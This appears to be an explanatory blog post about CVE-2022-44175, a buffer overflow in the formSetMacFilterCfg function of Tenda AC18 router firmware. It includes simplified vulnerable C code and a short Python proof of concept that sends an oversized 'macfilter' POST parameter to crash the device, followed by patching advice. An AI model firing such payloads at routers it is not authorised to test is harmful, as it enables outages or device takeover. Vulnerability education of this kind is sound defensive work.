In November 2022, security researchers identified a critical buffer overflow vulnerability in the Tenda AC18 router firmware, version V15.03.05.19. This bug, now known as CVE-2022-44175, lets attackers execute unauthorized code on the device, potentially taking over the router completely. In this post, let's break down how this vulnerability works, see code snippets, and look at how attackers can exploit it.
Firmware: V15.03.05.19 and possibly earlier versions (check your device!)
If your router uses this firmware, you should be aware of this vulnerability.
The Vulnerable Function: formSetMacFilterCfg
The root cause of CVE-2022-44175 is a buffer overflow in a function called formSetMacFilterCfg. This function is used by the web admin interface to handle setting MAC address filtering rules.
Buffer Overflow Explained Simply
A buffer overflow happens when a program tries to store more data in a buffer (a temporary storage area) than it can handle. Insecure programming, such as missing input size checks, can let an attacker send data that "overwrites" parts of memory, which can lead to crashing or, even worse, running attacker's code.
Below is a simplified look at how this bug happens inside formSetMacFilterCfg
void formSetMacFilterCfg(void *webRequest) {
char macAddr[32];
char *input = webGetVar(webRequest, "macfilter", "");
strcpy(macAddr, input); // <-- No length check!
// further code...
}
- Problem:strcpy is copied directly without checking if input is bigger than macAddr (32 bytes).
- What can go wrong? If an attacker submits a "macfilter" POST parameter longer than 32 bytes, it will overwrite other data, including return addresses.
How Can This Vulnerability Be Exploited?
Since this function is called when setting MAC filters via the admin web interface, an attacker just needs to make a crafted web request.
Step-by-Step Exploit (Conceptual)
1. Access the Web Interface: The attacker must reach the web admin UI. This usually requires being on the same network, but if remote management is enabled, it's exposed to the internet.
2. Send Oversized Data: The attacker sends a POST request with the "macfilter" parameter set to a string longer than 32 bytes.
3. Overwrite Memory: This corrupts memory, such as the return address, letting the attacker hijack execution flow.
Let's see how an attacker might exploit this using Python
import requests
url = "http://ROUTER-IP/goform/formSetMacFilterCfg";
# Let's create a payload longer than 32 bytes
payload = "A" * 100 # 100 bytes (enough to overflow and cause problems)
data = {
"macfilter": payload,
# Include any other form fields required by the router.
}
# If authentication is required, you may need to add headers or cookies
response = requests.post(url, data=data)
print("Status:", response.status_code)
print("Body:", response.text)
* Replace ROUTER-IP with your router's actual IP address.
Note: For real attacks, an attacker will craft the payload to place their own shellcode or attack instructions. This example just demonstrates the overflow (and may crash the process).
References
- NIST CVE-2022-44175
- Original vulnerability report: GitHub Issue
- ExploitDB (if available): See Exploit Details
What Should You Do?
1. Update Your Router Firmware: Always use the latest version. Tenda may have released a patch for this or similar bugs.
2. Restrict Admin Access: Make sure web admin is not accessible from the internet, and preferably only from trusted devices or networks.
Summary
CVE-2022-44175 is a classic buffer overflow in Tenda’s AC18 firmware, allowing attackers to run malicious code by exploiting insufficient input checking in the formSetMacFilterCfg function. If you own this device, update your firmware and harden your network. For a technical audience, this is a reminder of why proper input handling is essential in C programming—never trust user data!
Timeline
Published on: 11/21/2022 18:15:00 UTC
Last modified on: 11/28/2022 13:47:00 UTC